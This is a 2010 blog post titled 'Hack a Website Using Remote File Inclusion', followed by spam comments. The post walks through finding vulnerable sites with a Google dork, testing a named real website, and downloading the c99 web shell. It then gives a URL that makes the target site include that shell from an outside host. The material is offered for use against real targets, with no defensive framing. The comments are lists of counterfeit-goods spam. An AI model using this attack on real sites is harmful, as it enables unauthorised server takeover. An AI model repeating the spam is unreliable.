Saturday, September 4, 2010

Hack a Website Using Remote File Inclusion


Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it.

 
 
Searching the Vulnerability
Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to the below one
www.Targetsite.com/index.php?page=Anything
To find the vulnerability the hacker will most commonly  use the following Google Dork
“inurl:index.php?page=”
This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command
www.targetsite.com/index.php?page=www.google.com
Lets say that the target website is http://www.cbspk.com
So the hacker url will become
http://www.cbspk.com/v2/index.php?page=http://www.google.com
If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack.
Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:
http://www.4shared.com/file/107930574/287131f0/c99shell.html?aff=7637829
The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.
Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is
http://h1.ripway.com/rafaybaloch/c99.txt
Now here is how a hacker would execute the following command to gain access
http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/rafaybaloch/c99.txt?
Don't forget to say thanks...


Reactions:

3 comments:

Dong Dong said...

20151130dongdong
adidas gazelle
toms outlet
michael kors outlet
sac longchamp pliage
adidas uk
michael kors handbags
michael kors handbags
air max 95
true religion jeans
michael kors outlet
ghd hair straighteners
michael kors
ugg boots
hollister uk
coach factory outlet online
nike store uk
ugg boots
hermes belt
moncler outlet
fitflops
canada gooses jackets
ralph lauren outlet
oakley sunglasses
michael kors uk
toms outlet
nike uk
jordan shoes
new balance outlet
louis vuitton uk
louis vuitton handbags
michael kors
adidas shoes
prada outlet
kate spade outlet
nike trainers
christian louboutin outlet
michael kors
michael kors outlet
nike roshe run women
gucci borse

chenlina said...

chenlina20160304
jordan retro 11
louis vuitton
louis vuitton outlet
hollister outlet
gucci outlet
ugg boots
fitflops
timberland outlet
vans shoes sale
oakley outlet
nike trainers uk
chanel bags
louis vuitton handbags
louis vuitton outlet stores
uggs on sale
abercrombie and fitch
michael kors outlet
air max 95
canada goose jackets
louis vuitton outlet
oakkey sunglasses
ray ban sunglasses outlet
louis vuitton outlet
louis vuitton outlet
replica rolex watches
kobe bryant shoes
ralph lauren outlet
replica watches
louis vuitton outlet
tory burch outlet
cheap ugg boots
air jordans
coach factory outlet online
oakley sunglasses
uggs for women
canada goose coats
prada handbags
abercrombie and fitch
coach factory outlet
nike air max
as

dong dong23 said...

nhl jerseys
michael kors handbags clearance
nike air max 90
nike shoes
new balance 999
coach outlet store online
burberry sale
michael kors outlet clearance
coach outlet online
polo shirts wholesale
2017.3.21chenlixiang

Post a Comment

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Web Hosting Bluehost